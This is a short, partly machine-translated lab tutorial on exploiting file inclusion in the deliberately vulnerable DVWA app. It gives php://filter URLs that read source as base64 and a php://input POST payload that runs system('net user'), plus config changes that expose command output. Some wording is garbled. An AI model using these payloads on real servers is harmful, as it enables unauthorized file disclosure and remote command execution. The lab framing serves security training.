php contains read and write files
php contains read files
lab environment
实验环境DVWA,安全性low
条件是要知道这个文件的名称和路径
operating
The browser opens the proxy, starts burp and constructs the URL
http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=x.
The role of the php address is to access the URL, modify the parameters that contain the function, and thus get the base64 encrypted string through the php protocol (php: // filter / read).
Then decrypt it to get the PHP data content.
php include write file
Construct URL
http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://input
And the post data submitted by burp is: <? Php system ('net user');?> Use php language, system function, execute net user
function can also use many other functions that can execute commands can be used here
note
It
can be used only when allow _url_include is on. If you want to view the echo results, you must find php-apache2handler.ini to open it under C: \ php \ php-5.2.14-Win32. Look for display_funtions = proc-open, oppen , exec, system ……. Delete system and restart apache.